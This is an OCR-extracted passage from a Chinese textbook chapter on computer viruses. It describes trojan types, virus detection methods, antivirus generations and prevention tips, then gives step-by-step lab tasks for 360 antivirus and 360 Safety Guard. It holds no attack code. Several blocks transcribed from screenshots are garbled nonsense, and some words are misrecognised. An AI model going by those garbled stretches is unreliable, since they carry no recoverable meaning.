立即 弹出 端口 主动 连接 控制 端 打开 的 被 动 端口 ;为 了 隐蔽 起 见 ,控制 端的 被 动 端口 一 般 是 
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80 ,使 用 户 以 为 是 自己 在 浏览 网 页 。 

(8) 代理 木马 。 黑 客 在 入 侵 的 同时 会 掩盖 自己 的 足迹 ,谨防 别人 发 现 自己 的 身份 。 代 
理 木 马 最 重要 的 任务 就 是 给 被 控制 的 * 肉 机 ?种 上 代理 木马 ,让 其 变 成 攻击 者 发 动 攻击 的 跳 
板 。 通 过 代理 木马 ,攻击 者 可 以 在 匿名 的 情况 下 使 用 Telnet、ICQ、IRC 等 程序 ,从 而 隐 项 自 
己 的 踪迹 。 

(9) 程序 杀手 木马 。 前 面 的 木马 功能 虽然 形形色色 ,不 过 到 了 对 方 机 器 上 要 发 挥 作用 ， 
还 需要 过 防 木马 软件 这 一 关 。 常 见 的 防 木马 软件 有 Zone Alarm、Norton Anti-Virus 等 。 
而 程序 杀手 木马 则 可 以 关闭 对 方 机 器 上 运行 的 这 类 程序 ,使 得 其 他 的 木马 更 好 地 发 挥 作用 。 


4.3.6 反 病 毒 技术 


1. 病毒 检测 原理 


在 与 病毒 的 对 抗 中 ,及 早 发 现 病毒 是 很 重要 的 。 早 发 现 . 早 处 置 ,可 以 减少 损失 。 检 测 
病毒 方法 有 :特征 代码 法 、 校 验 和 法 .行为 监测 法 .软件 模拟 法 .比较 法 、 传 染 实验 法 等 ,这 些 
方法 依据 的 原理 不 同 , 实 现时 所 需 开 销 不 同 , 检 测 范围 不 同 , 各 有 所 长 。 

@ 特征 代码 法 。 特 征 代码 法 是 检测 已 知 病毒 的 最 简单 .开销 最 小 的 方法 。 其 原理 是 采 
集 所 有 已 知 病毒 的 特征 代码 ,并 将 这 些 病毒 独 有 的 特征 代码 存放 在 一 个 病毒 资料 库 ( 病 毒 
库 ) 中 。 检 测 时 ,以 扫描 的 方式 将 待 检测 文件 与 病毒 库 中 的 病毒 特征 代码 进行 一 一 对 比 ,如 
果 发 现 有 相同 的 特征 代码 ,由 于 特征 代码 与 病毒 一 一 对 应 , 便 可 以 断定 ,被 查 文件 中 感染 何 
种 病毒 。 

特征 代码 法 的 优点 是 :检测 准确 快速 .可 识别 病毒 的 名 称 . 误 报警 率 低 .依据 检测 结果 可 做 
解毒 处 理 。 特 征 代码 法 对 从 未 见 过 的 新 病毒 ,自然 无 法 知道 其 特征 代码 ,因而 无 法 去 检测 这 些 
新 病毒 。 随 着 已 知 病毒 数量 的 不 断 增加 ,病毒 库 将 越 来 越 大 ,病毒 扫描 速度 也 将 越 来 越 慢 。 

@ 校 验 和 法 。 校 验 和 法 是 将 正常 文件 的 内 容 . 计 算 其 校 验 和 ,将 该 校 验 和 写 入 文件 中 
或 写 入 别 的 文件 中 保存 。 在 文件 使 用 过 程 中 ,定期 地 或 每 次 使 用 文件 前 ,检查 文件 现在 内 容 
算出 的 校 验 和 与 原来 保存 的 校 验 和 是 否 一 致 :以 此 来 发 现 文件 是 否 感 染病 毒 。 采 用 校 验 和 
法 检测 病毒 既 可 发 现 已 知 病毒 又 可 发 现 未 知 病毒 ,但 是 它 不 能 识别 病毒 种 类 ,更 不 能 报 出 病 
毒 名 称 。 由 于 病毒 感染 并 非 文件 内 容 改变 的 唯一 的 非 他 性 原因 :文件 内 容 的 改变 有 可 能 是 
由 正常 程序 引起 的 ,所 以 校 验 和 法 常常 误 报警 。 

@ 行为 监测 法 。 利 用 病毒 的 特有 行为 特征 来 监测 病毒 的 方法 , 称 为 行为 监测 法 。 通 过 
对 病毒 多 年 的 观察 .研究 ,人 们 发 现 有 一 些 行为 是 病毒 的 共同 行为 ,而 且 比较 特殊 。 当 程序 
运行 时 ,监视 其 行为 ,如 果 发 现 了 病毒 行为 ,立即 报警 。 

@ 软件 模拟 法 。 它 是 一 种 软件 分 析 器 ,用 软件 方法 来 模拟 和 分 析 程 序 的 运行 ,之 后 演 
绎 为 虚拟 机 上 进行 的 查 毒 ,启发 式 查 毒 技术 等 .是 相对 成 熟 的 技术 。 新 型 检测 工具 纳入 了 软 
件 模拟 法 ,该 类 工具 开始 运行 时 ,使 用 特征 代码 法 检测 病毒 ,如 果 发 现 有 隐藏 性 病毒 或 多 态 
性 病毒 (采用 特殊 加 密 技术 编写 的 病毒 ) 嫌 疑 时 ,启动 软件 模拟 模块 .监视 病毒 的 运行 , 待 病 
毒 自身 的 密码 译 码 以 后 ,再 运用 特征 代码 法 来 识别 病毒 的 种 类 。 

多 态 性 病毒 每 次 感染 都 变化 其 病毒 密码 ,对 付 这 种 病毒 时 特征 代码 法 会 失效 。 因 为 多 
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态 性 病毒 代码 实施 密码 化 ,而 且 每 次 所 用 密 钥 不 同 ,把 染 毒 的 病毒 代码 相互 比较 ,也 无 法 找 
出 相同 的 可 能 作为 特征 的 稳定 代码 。 虽 然 行为 监测 法 可 以 检测 多 态 性 病毒 ,但 是 在 检测 出 
病毒 后 ,因为 不 知 病毒 的 种 类 ,难以 做 “消毒 ”处 理 。 

加 比较 法 。 比 较 法 是 用 原始 的 或 正常 的 文件 与 被 检测 的 文件 进行 比较 。 比 较 法 包括 
长 度 比较 法 .内容 比 较 法 .内 存 比较 法 .中 断 比较 法 等 。 这 种 比较 法 不 需要 专用 的 检测 病毒 
程序 ,只 要 用 常规 DOS 软件 和 PCTools 等 工具 软件 就 可 以 进行 。 

@ 传染 实验 法 。 这 种 方法 的 原理 是 利用 了 病毒 的 最 重要 的 基本 特征 一 一 传染 性 。 所 
有 的 病毒 都 会 进行 传染 .如 果 不 会 传染 ,就 称 不 上 病毒 。 如 果 系 统 中 有 异常 行为 ,最 新 版 的 
检测 工具 也 查 不 出 病毒 时 ,就 可 以 做 传染 实验 ,运行 可 疑 系统 中 的 程序 后 ,再 运行 一 些 确切 
知道 不 带 毒 的 正常 程序 ,然后 观察 这 些 正常 程序 的 长 度 和 校 验 和 ,如 果 发 现 有 的 程序 长 度 增 
长 ,或 者 校 验 和 发 生变 化 ,就 可 断言 系统 中 有 病毒 。 

现在 的 杀毒 软件 一 般 是 利用 其 中 的 一 种 或 几 种 手段 进行 检测 ,严格 地 说 ,由 于 病毒 编制 
技术 的 不 断 提 高 , 想 绝 对 地 检测 或 者 预防 病毒 目前 还 不 能 说 有 完全 的 把 握 。 


2. 反 病 毒 软件 


到 目前 为 止 , 反 病 毒 软件 已 经 经 历 了 4 个 阶段 ,具体 如 下 。 

@ 第 一 代 反 病毒 软件 采取 单纯 的 特征 码 检测 技术 ,将 病毒 从 染 毒 文件 中 清除 。 这 种 方 
法 准确 可 靠 。 但 后 来 由 于 病毒 采取 了 多 态 .变形 等 加 密 技 术 后 ,这 种 简单 的 静态 扫描 技术 就 
有 些 力 不 从 心 了 。 

@ 第 二 代 反 病毒 软件 采用 了 一 般 的 启发 式 扫描 技术 .特征 码 检测 技术 和 行为 监测 技 
术 , 加 入 了 病毒 防火 墙 ,实时 对 病毒 进行 动态 监控 。 

@ 第 三 代 反 病毒 软件 在 第 二 代 反 病毒 软件 的 基础 上 采用 了 虚拟 机 技术 ,将 查 、 杀 病毒 
合 二 为 一 ,具有 能 全 面 实现 防 、 查 、 杀 等 反 病毒 所 必 备 的 能 力 . 并 且 以 驻 留 内 存 的 形式 有 效 防 
止 病毒 的 人 侵 。 

@ 现在 的 反 病 毒 软件 已 经 基本 跨 入 了 第 四 代 。 第 四 代 反 病毒 软件 在 第 三 代 反 病毒 软 
件 的 基础 上 ,结合 人 工 智能 技术 .实现 启发 式 、 动 态 、 智 能 的 查 杀 技术 。 它 采用 了 CRC 校 验 
和 扫描 机 理 、 启 发 式 智能 代码 分 析 模 块 动态 数据 还 原 模块 (这 种 技术 能 一 定 程度 上 查 杀 加 
这 伪装 后 的 病毒 ) .内存 杀毒 模块 、 自 身 免疫 模块 (防止 自身 染 毒 .防止 自身 被 病毒 强行 关闭 ) 
等 先进 技术 , 较 好 地 克服 了 前 几 代 反 病 毒 软件 的 缺点 。 


3. 病毒 的 预防 


计算 机 病毒 的 预防 是 指 通过 建立 合理 的 病毒 预防 体系 和 制度 ,及 时 发 现 病毒 人 侵 , 并 采 
取 有 效 的 手段 来 阻止 病毒 的 传播 和 破坏 。 当 前 ,计算 机 病毒 十 分 独 狂 ,即便 安装 了 反 病 毒 软 
件 , 也 不 能 说 是 绝对 的 安全 ,用 户 应 养 成 安全 习惯 ,重点 在 病毒 的 预防 上 下 工夫 。 下 面 是 几 
种 常用 的 病毒 预防 技术 。 

吕 操作 系统 漏洞 的 检测 和 安全 补丁 安装 。 对 病毒 的 预防 是 从 安装 操作 系统 开始 的 , 安 
装 前 应 准备 好 操作 系统 补丁 和 反 病 毒 软件 .防火墙 软件 等 。 安 装 操作 系统 时 ,必须 拔 掉 网 
线 。 操 作 系 统 安装 完毕 后 ,必须 立即 打上 补丁 并 安装 反 病毒 软件 和 防火 墙 软件 。 

系统 漏洞 检测 可 以 自动 发 现 系统 中 存在 的 问题 ,很 多 反 病毒 软件 自 带 漏洞 检测 工具 , 漏 
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洞 检测 工具 的 使 用 也 很 简单 .常见 的 安全 工具 都 提供 相应 的 漏洞 扫描 功能 ,如 “360 安全 卫 
士 ? 提 供 的 系统 漏洞 扫描 功能 就 可 以 实现 漏洞 扫描 ,自动 安装 漏洞 补丁 。 

@ 操作 系统 安全 设置 。 必 须 设 置 登录 账户 密码 .并 且 必 须 设置 得 复杂 一 些 , 不 能 太 简 
单 或 不 设置 。 这 部 分 的 内 容 在 项 目 2 中 已 作 详细 介绍 。 

@ 及 时 升级 病毒 特征 库 。 要 及 时 升级 反 病 毒 软 件 和 病毒 特征 库 , 一 般 可 设置 为 每 天 自 
动 定 时 升级 。 

@ 关闭 不 必要 的 端口 。 病 毒 人 侵 和 传播 通常 使 用 137、138、139 和 445 端口 ,关闭 这 些 
端口 后 ,将 无 法 再 使 用 网 上 邻居 和 文件 共享 功能 。 建 议 用 户 关闭 这 些 端口 。 

回 谨慎 安装 各 种 插件 。 访 问 网 页 时 , 若 网 页 弹出 提示 框 , 要 求 安装 什么 插件 时 ,一 定 要 
看 清楚 是 安装 什么 东西 ,不 要 随意 同意 安装 。 

@ 不 要 随意 访问 不 知名 网 站 ,可 减少 中 病毒 的 机 会 ,可 以 考虑 使 用 带 有 网 页 防御 功能 
的 安全 浏览 器 产品 。 

@ 不 要 随意 下 载 文件 .打开 电子 邮件 附件 及 使 用 P2P 传输 文件 等 。 

@ 删除 系统 中 的 默认 共享 资源 。 

@ 定期 备份 重要 文件 ,定期 检查 敏感 文件 和 敏感 部 位 。 


44 项 目 实施 


4.4.1 任务 1: 360 杀毒 软件 的 使 用 


1. 任务 目标 


(1) 掌握 360 杀毒 软件 的 使 用 方法 。 
(2) 了 解 安装 杀毒 软件 的 重要 性 。 


2. 任务 内 容 


(1) 安装 360 杀毒 软件 。 
(2) 软件 升级 。 
(3) 病毒 查 杀 。 
(4) 软件 印 载 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 1 台 。 
(2) 360 杀毒 软件 1 套 。 


4. 任务 实施 步骤 


360 杀毒 软件 是 360 安全 中 心 出 品 的 一 款 免 费 的 云 安全 杀毒 软件 .具有 查 杀 率 高 ,资源 
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占用 少 、 升 级 迅速 等 优点 。360 杀毒 软件 于 2009 年 10 月 28 日 通过 了 公安 部 计算 机 病毒 防 
治 产品 检验 中 心 的 检验 ,2009 年 12 月 首次 参加 国际 权威 VB100 认证 即 获 通过 ,2011 年 
4 月 11 日 再 度 高 分 通过 VB100 测试 。 

(1) 安装 360 杀毒 软件 

步骤 1: 在 360 杀毒 官方 网 站 (sd. 360. cn) 下载 最 新 版 本 的 360 杀毒 软件 安装 程序 ,本 
项 目 以 360 杀毒 软件 v3. 0 版 本 为 例 来 说 明 。 

步骤 2: 双击 已 经 下 载 的 安装 程序 图 标 , 进 入 安装 向 导 . 如 图 4-5 所 示 , 选 中 “我 已 阅读 
并 同意 软件 安装 协议 " 复 选 框 ,否则 无 法 安装 。 安 装 路 径 默 认为 “C:\Program Files\360\ 
360sd”, 也 可 单 击 右 侧 的 按钮 更 改 安装 路 径 。 

步骤 3: 单 击 “下 一 步 ? 按 钮 ,开始 安装 360 杀毒 软件 ,如 图 4-6 所 示 。 


欢迎 使 用 “360 杀 毒 “ 安 装 向 导 


tne on me 
i 


香 南 [下 一 东 0)] 籽 检 


EL 


[cr | 


图 4-5 安装 向 导 (1) 


步骤 4: 安装 结束 时 ,询问 是 否 安装 360 安全 卫 
士 ,选中 “安装 360 安全 卫士 " 复 选 框 ,如 图 4-7 所 示 。 

步骤 5: 单 击 * 下 一 步 按 钮 ,系统 开始 下 载 “360 
安全 卫士 软件, 下载 完 成 后 自动 进行 安装 ,安装 完 
成 后 ,选中 “重新 启动 计算 机 " 复 选 框 ,如 图 4-8 所 示 。 

步骤 6: 单 击 “ 完 成 ”按钮 ,弹出 “重新 启动 计算 
机 ”对 话 框 , 单 击 " 重 新 启动 ”按钮 .如 图 4-9 所 示 , 立 
即 重新 启动 系统 。 图 4-7 安装 向 导 (3) 

(2) 软件 升级 

360 杀毒 软件 具有 自动 升级 功能 ,如 果 开启 了 自动 升级 功能 ,360 杀毒 软件 会 在 有 升级 
可 用 时 自动 下 载 并 安装 升级 文件 。 自 动 升级 完成 后 会 通过 气泡 窗口 来 提示 。 

步骤 1: 双击 桌面 上 的 “360 杀毒 "图 标 .打开 “360 杀毒 " 主 窗口 ,选择 “产品 升级 ”选项 
卡 , 如 图 4-10 所 示 。 

步骤 2: 单 击 “ 人 修改” 链接, 打开“ 设置" 对话 框 ,在 左 侧 窗 格 中 选择 “升级 设置 "选项 ,在 右 
侧 窗 格 中 选中 “自动 升级 病毒 特征 库 及 程序 ” 单 选 按 钮 ,如 图 4-11 所 示 。 

步骤 3: 单 击 “确定 "按钮 :返回 “360 杀毒 " 主 窗口 .也 可 单 击 “ 检 查 更 新 ”按钮 进行 手动 
更 新 ,升级 程序 会 连接 服务 器 检查 是 否 有 可 用 更 新 .如 果 有 ,就 会 下 载 并 安装 升级 文件 ,升级 
完成 后 会 提示 “恭喜 您 ! 现在 360 杀毒 已 经 可 以 查 杀 最 新 病毒 啦 !”。 
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产品 升级 
了 于 升 名 要 库 且 程序 , 可 以 保护 电 有 可 得 最 位 抱 扣 。 查看 天 生日 志 


图 4-10 “产品 升级 "选项 卡 


(3) 病毒 查 杀 

360 杀毒 软件 具有 实时 病毒 防护 和 手动 扫描 功能 ,为 系统 提供 全 面 的 安全 防护 。 

实时 防护 功能 在 文件 被 访问 时 对 文件 进行 扫描 ,及 时 拦截 活动 的 病毒 ,在 发 现 病毒 时 会 
通过 提示 窗口 发 出 警告 。 

360 杀毒 软件 提供 了 四 种 手动 病毒 扫描 方式 :快速 扫描 、 全 盘 扫 描 、 指 定位 置 扫描 和 古 
键 扫 描 。 

步骤 1: 在 “360 杀毒 " 主 窗口 中 ,选择 “病毒 查 杀 ”选项 卡 , 如 图 4-12 所 示 。 

步骤 2: 单 击 “ 快 速 扫描 ”链接 ,360 杀毒 主要 扫描 Windows 系统 日 录 、Program Files 目 
录 等 关键 位 置 。 

步骤 3: 单 击 “ 全 盘 扫 描 " 链 接 ,360 杀毒 扫描 所 有 磁盘 。 
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图 4-12 “病毒 查 杀 ”选项 卡 


步骤 4: 单 击 “指定 位 置 扫描 "链接 ,打开 “选择 扫描 上 日 录 ” 对 话 框 ,选择 需要 扫描 的 盘 符 
或 日 录 , 如 “本 地 磁盘 (C:)”, 如 图 4-13 所 示 , 单 击 “ 扫 描 " 按 钮 ,开始 对 指定 的 盘 符 或 日 录 进 
行 病毒 查 杀 。 

步骤 $: 右键 扫描 。 右 击 某 文件 夹 .如 “C:\Program Files”, 在 弹出 的 快捷 菜单 中 选择 
“使 用 360 杀毒 扫描 ”命令 ,如 图 4-14 所 示 ,可 对 该 文件 夹 进行 病毒 查 杀 。 

步骤 6: 启动 扫描 后 ,会 显示 扫描 进度 窗口 ,在 这 个 窗口 中 可 看 到 扫描 的 文件 ,总体 进 
度 . 以 及 发 现 的 威胁 对 象 和 威胁 类 型 .如 图 4-15 所 示 。 

步骤 7: 如 果 和 希望 360 杀毒 在 扫描 完成 后 自动 关闭 计算 机 .请 选中 “扫描 完成 后 关闭 计 
算 机 ” 复 选 框 。 
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请 切 壬 上 您 要 打捞 的 目录 事件: 


图 4-13 “选择 扫描 目录 ”对 话 框 
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口 自动 处 理 扫描 出 的 病 楷 不 肋 


项 目 4 计算 机 病毒 及 防治 


a 
文件 中 久 名 区) 查看 WD 收藏 W) 工具 D 而 助 史 | 六 
ORe -©O- ?Pew x | XD 
Ec \ 
I FZ E:T 
Er 文人 天 
rey 文件 天 
六 天 
已 scr 条 天 全 文件 天 
ros 文件 天 
Dm HN 天 2012-3-16 18:13 


口 扫 3 给 才 成 后 关闭 计算 机 


图 4-14 右键 扫描 


已 用 时 间 : 00-01 .41 
后 及 兴 型 
开机 答 录 窗口 无 法 关闭 系统 
管理 土 频 设 备 的 服务 局 动 方式 异 寓 


图 4-15 病毒 查 杀 


(4) 软件 卸载 


步骤 1: 选择 “开始 ”一 “程序 ”>“360 安全 中 心 ” 一 “360 杀毒 ”一 “ 印 载 360 杀毒 ”命令 ， 
打开 “360 杀毒 - 印 载 确认 ?对话 框 , 如 图 4-16 所 示 。 


步骤 2: 选中 "我 要 直接 务 载 360 杀毒 " 单 选 按钮 ,再 单 击 * 直 接 印 载 ”按钮 , 印 载 程序 开 


始 删除 程序 文件 .如 图 4-17 所 示 。 


步骤 3: 仓 载 完成 后 ,提示 是 否 重新 启动 计算 机 ,如 图 4-18 所 示 , 如 果 想 立即 重新 启动 


计算 机 , 先 关闭 其 他 应 用 程序 ,再 选中 * 是 .现在 重新 启动 " 单 选 按钮 单 
动 系统 。 重 新 启动 系统 之 后 ,360 杀毒 软件 完成 印 载 。 


“完成 ”按钮 重新 启 
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加 360 杀 机- 郑 瞄 确认 


BB maxas, | 
,< 。 郧 可 久 才 斌 我们 提供 的 及 沁 方 吉 。 


请 夺权 疙 遇 到 的 情况 或 者 丰 拉 部 比 : 


360 庆 三 工作 不 正 党 
和 和 9 电 及 至 、 于 下 了 


其 要 下 所 D360 妇 而 


Ei 取 汕 


图 4-16 “360 杀毒 -卸载 确认 ”对话 框 


将 360 杀 过 解除 安装 
正在 完成 “360 杀 毒 "卸载 向 导 


让 人 生生， 以 便 完成 “360 杀 毒 ”的 郑 载 。 


他 区 ,现在 重 款 启动 四 
C 否 , 我 稍 后 再 自行 重新 启动 中 


ET 


图 4-18 提示 是 否 重新 启动 计算 机 


4.4.2 任务 2:360 安全 卫士 软件 的 使 用 


1. 任务 目标 


(1) 掌握 360 安全 卫士 的 使 用 方法 。 
(2) 了 解 360 安全 卫士 的 作用 。 


2. 任务 内 容 


(1) 升级 360 安全 卫士 。 
(2) 电脑 体检 。 
(3) 查 杀 木马 。 
(4) 清理 插件 。 
(5) 修复 漏洞 。 
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3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 1 台 。 
(2) 360 安全 卫士 软件 1 套 。 


4. 任务 实施 步骤 


360 安全 卫士 是 当前 功能 较 强 ,效果 较 好 、 较 受用 户 欢 迎 的 上 网 必 备 安全 软件 之 一 。 由 
于 使 用 方便 ,用 户口 碑 好 ,目前 5 亿 多 名 中 国 网 民 中 ,首选 安装 360 安全 卫士 的 已 超过 3 亿 名 。 

360 安全 卫士 拥有 查 杀 木马 .清理 插件 、 修 复 漏 洞 . 电 脑 体检 等 多 种 功能 ,并 独创 了 * 木 
马 防火 墙 ?功能 ,依靠 抢先 侦 测 和 云端 鉴别 ,可 全 面 、 智 能 地 拦截 各 类 木马 ,保护 用 户 的 账号 、 
隐私 等 重要 信息 。360 安全 卫士 自身 非常 轻巧 ,同时 还 具备 开机 加 速 ,垃圾 清理 等 多 种 系统 
优化 功能 ,可 大 大 加 快 计算 机 运行 速度 ,内 含 的 360 软件 管家 还 可 帮助 用 户 轻 松下 载 、 升 级 
和 强力 印 载 各 种 应 用 软件 。 

在 任务 1 中 ,已 安装 了 360 安全 卫士 软件 。 

(1) 升级 360 安全 卫士 

360 安全 卫士 的 升级 会 在 每 次 启动 时 自动 完成 的 , 单 击 任务 栏 中 的 360 安全 卫士 图 
标号 ,打开 360 安全 卫士 主 窗口 ,系统 自动 完成 升级 ,如 图 4-19 所 示 , 也 可 双击 窗口 底部 状 
态 栏 中 的 “检查 更 新 "链接 ,进行 手动 更 新 。 


360 安 全 卫 十 8.5 


-一 


您 的 计算 机 还 未 进行 过 体检 ， 建 议 立 即 体检 ! 9 FTIR 
仁 检 可 以 全 面 的 查 出 计算 机 中 的 不 安全 和 济 度 慢 问 题 ， 并且 陛 一 健 进 行 修复 ! 
进入 


本 马 防火 坊 
尚未 发 现 不 马 程序 
进入 
ED Met 
IE 主 页 未 镜 定 锁定 
ss 嫩 定 后 可 防止 森马 基 改 
人 QQ 立即 体检 ee 
加 国 


安全 不 面 同 后 。 流量 防火 墙 进程 共 理 
沽 开 F 法 解决 问题 ?论坛 求助 
总 或 推荐 次 使 用 人 工 系统 修复 服务 
查 亲 修 复 后 出 现 恒 第 ? 可 进行 做 复 
《tm 和 的 小 包 : 太空 产 》360 入 家 首发 
计算 机 卡 ?计算 机 慢 ? 专家 在 线 为 你 解决? 
各 气相;5.0.2001 各 用 木马 库 ; Eee) E360 人 中 人 


图 4-19 360 安全 卫士 主 窗口 


由 图 4-19 可 见 ,360 安全 卫士 界面 集 * 电 脑 体检 、 查 杀 木 马 、 清 理 插 件 、 修 复 漏洞 、 清 理 
垃圾 、 清 理 痕迹 、 系 统 修复 ”等 多 种 功能 于 一 身 . 并 独创 了 “木马 防火 墙 ”功能 ,同时 还 具备 开 
机 加 速 、 垃 圾 清理 等 多 种 系统 优化 功能 .可 大 大 加 快 计算 机 的 运行 速度 ,内 含 的 360 软件 管 
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家 还 可 帮助 用 户 轻松 下 载 、. 升 级 和 强力 印 载 各 种 应 用 软件 .并且 还 提供 多 种 实用 工具 帮助 用 
户 解决 计算 机 问题 和 保护 系统 安全 。 


(2) 电脑 体检 

“电脑 体检 ”功能 可 以 全 面 地 检查 用 户 计 算 机 的 各 项 状况 。 体 检 完 成 后 会 提交 一 份 优 化 
计算 机 的 意见 ,用 户 可 以 根据 需要 对 计算 机 进行 优化 。 也 可 以 便捷 地 选择 “一 键 优化 ”。 

体检 可 以 快速 全 面 地 了 解 用 户 的 计算 机 ,并 且 可 以 提醒 用 户 对 计算 机 做 一 些 必 要 的 维 
护 , 如 查 杀 木 马 .清理 垃圾 、 修 复 漏洞 等 。 定 期 体检 可 以 有 效 地 保持 用 户 计 算 机 的 健康 。 

步骤 1: 在 360 安全 卫士 主 窗口 中 , 单 击 “ 常 用 ”按钮 ,在 “电脑 体检 ”选项 卡 中 , 单 击 “ 立 
即 体检 ”按钮 ,360 安全 卫士 开始 对 系统 的 木马 病毒 、 系 统 漏洞 . 差 评 插 件 等 各 个 项 日 进行 检 
测 ,检测 结束 后 给 出 一 个 体检 得 分 ,如 图 4-20 所 示 。 


自问 日 加 生日 @ ee 
| 区 过 二 加 | 


一 全 滞 理 二 


电脑 体检 得 分 ，.39 人 实时 防护 已 开启 。 龟 
您 的 计算 机 处 于 李 常 匈 隐 的 状 旋 ， 清 立即 修复 1 


共 H3 共 了 52 项 , 其 中 7 项 有 问题 CED) 民国 杯 马 防 火 培 进入 
尚未 发 现 不 马 程序 
进入 
危险 项 目 〈2)》 - 这 此 项目 可 能 守 病 可 趟 马 利用 ， 请 尽快 族 复 | ps 
人 @ 多 的 电脑 存在 115 个 高 危 源 洞 洋 傅 修复 3 E 镇 定 , 饥 定 
二 机 a 
KB9 Nat 中 可 能 交 许 远程 代码 执行 的 小 油 补丁 
ke 得 序 功能 推荐 
ees 加 回国 昌 
安全 点 面 。。 网 后 。 流量 防火 墙 进 村 管理 
详情 
OA 妆 丰 sa。 洒 到 无 法 解决 问题 了 论坛 有 助 
开机 区 和 录 贸 口 无 法 关闭 系 抚 总 了 或 推荐 您 使 用 人 工 系统 修复 服务 
查 杀 修复 后 出 现 异 第 ?可 进行 你 复 
优化 项 目 《5》- 推荐 修复 这 些 项 目 
和 各 术 进 行 过 不 马 所 擅 扫 若 《 情 基 的 小 驴 ; 大 版 》 360 儿 地 首发 
本 发 现 会 的 不 统 中 存放 均 塌 女 件 详情 FT 计算 机 不 ?了 计算 机 慢 ? 专家 在 识 为 你 解决 ? 
| 5.0.2001 备用 术 马 讶 : 2012.03.23 。 过 要 更 新 Emp 省 于 2605 安生 中公 
图 4-20 电脑 体检 


步骤 2: 单 击 “ 一 键 修复 ”按钮 ,对 所 有 存在 问题 的 项 日 进行 一 键 修复 。 

(3) 查 杀 木马 

利用 计算 机 程序 漏洞 侵入 后 窃取 文件 的 程序 被 称 为 木马 。 木 马 查 杀 功能 可 以 找 出 用 户 
计算 机 中 疑似 木马 的 程序 ,并 在 取得 用 户 允 许 的 情况 下 删除 这 些 程序 。 

木马 对 用 户 的 计算 机 危害 非常 大 ,可 能 导致 用 户 包 括 支 付 宝 、 网 络 银行 在 内 的 重要 账户 
密码 丢失 。 木 马 的 存在 还 可 能 导致 用 户 的 隐私 文件 被 复制 或 删除 ,所 以 及 时 查 杀 木 马 对 安 
全 上 网 来 说 十 分 重要 。 

步骤 1: 在 “ 查 杀 木 马 ”选项 卡 中 (如 图 4-21 所 示 ) ,可 以 选择 “快速 扫描 “全 盘 扫 描 ” 和 
“ 自 定义 扫描 ”来 检查 用 户 的 计算 机 里 是 否 存 在 木马 程序 。 
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和 总 g 9 生生 是 久 。 


pd 锯 复 区 (0) 信任 区 (0) 上 报 文件 (D) 设置 
[7 息 下 未 对 机 进行 本 3 扫 措 ， 建 议和 立 即 扫 揣 。 


国际 领先 查 杀 引 警 全 力 护航 上 局 安全 


a jo iQ “ee 


自 定义 扫描 坎 件 安 答 
eA ts 修复 第 用 欢 件 
CAD 病 过 专 杀 
梧 堆 查 亲 CAD 病 毒 
热点 问题 相公 全 而 可 总 
= > Word 局 动 报 情 修复 
电脑 门诊 > 任务 管理 器 蛋 寅 修复 
是 psaIERR? 厂 面 夫人 9 图 奈 ? 立即 全 用 > QQ 面板 鱼 接 打 不 开 。。 修复 
srs, TN. 
MBSD2001 “省 用 木马 库 : 2012.03.23 。 地 查 更 新 © ER 至 350 二 安全 中 作 
图 4-21 查 杀 木马 


步骤 2: 扫描 结束 后 车 出 现 疑似 木马 ,可 以 选择 删除 或 加 入 信任 区 。 

(4) 清理 插件 

插件 是 一 种 遵循 一 定 规范 的 应 用 程序 接口 编写 出 来 的 程序 。 很 多 软件 都 有 插件 ,例如 
在 正中 ,安装 相关 的 插件 后 ,Web 浏览 器 能 够 直接 调用 插件 程序 ,用 于 处 理 特定 类 型 的 文 
件 。 过 多 的 插件 会 降低 用 户 计算 机 的 运行 速度 。 清 理 插件 功能 会 检查 用 户 计 算 机 中 安装 了 
哪些 插件 ,用 户 可 以 根据 网 友 对 插件 的 评分 以 及 自己 的 需要 来 选择 清理 哪些 插件 、 保 留 哪些 
插件 。 

过 多 的 插件 会 降低 用 户 计算 机 的 运行 速度 。 而 很 多 插件 可 能 是 在 用 户 不 知情 的 情况 下 
安装 的 ,用 户 有 可 能 并 不 了 解 这 些 插件 的 用 途 , 也 并 不 需要 这 些 插 件 。 通 过 定期 地 清理 插 
件 ,用 户 可 以 及 时 地 删除 这 些 插件 ,保证 用 户 计 算 机 运行 的 正常 速度 。 

步骤 1: 在 "清理 插件 ?选项 卡 中 , 单 击 * 开 始 扫描 ?按钮 ,360 安全 卫士 开始 扫描 用 户 计 
算 机 中 所 有 存在 的 插件 。 

步骤 2: 扫描 结束 后 .360 安全 卫士 列 出 所 有 检测 到 的 插件 ,如 图 4-22 所 示 , 选 中 需要 清 
理 的 插件 , 单 击 “立即 清理 ”按钮 进行 清理 。 

(5) 修复 漏洞 

这 里 的 漏洞 是 特 指 Windows 操作 系统 在 逻辑 设计 上 的 缺陷 或 在 编写 时 产生 的 错误 。 

系统 漏洞 可 以 被 不 法 者 或 者 计算 机 黑客 利用 ,通过 植 人 木马 病毒 等 方式 来 攻击 或 控制 
整个 计算 机 ,从 而 窃取 用 户 计算 机 中 的 重要 资料 和 信息 ,甚至 破坏 用 户 的 系统 。 

步骤 1: 选择 “修复 漏洞 "选项 卡 ,360 安全 卫士 自动 开始 扫描 用 户 计算 机 中 存在 的 系统 
漏洞 。 
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360 安 全 卫士 8.5 便 用 简 洋 版 
需 用 kx 填 。 亲王 网 后。 防 深 号 研 件 检测 。 9 保 模 。 软 伞 关 家 。 起 
电脑 体检 |。 查 亲 林 马 “| ” 滞 理 括 征 “修复 泼 油 | 。 一 键 清理 ”| 。 滞 殖 过 极 | 。 洁 殖 请 迹 “| 。 系统 修复 “| 功能 大 全 
@ 扫 扩 元 成 ， 共 位 测 吕 | 28 款 括 件 ， 没有 发 现 委 评 插件 学 报 赤 意 软 件 。。 已 信任 插件 (0) 
国 软件 名 称 所 展 公 司 下 清理 建议 所作 
加 口 过 你 迅雷 下 载 组 件 全 全 襄 褒 宇 
实现 过 你 迅雷 下 载 的 必 备 组 件 ， 集 成 了 名 搜索 功能 的 过 你 迅雷 工具 栏 ; 清理 后 无 Ld 9.0 分 投票 全 和 
田口 snaglt 8 工具 栏 个 个 个 个 合 
屏 在 .文本 和 视频 捕获 与 转换 程序 th ， 84 分 投票 控 本 这 和 
口 淘宝 工具 条 站 蜂 EE 会合 全 全 全 和 本 汪 
一 款 用 于 询 宝 主要 相关 所 作 的 工具 栏 插件 。 8.0 分 投票 
phveta 网 
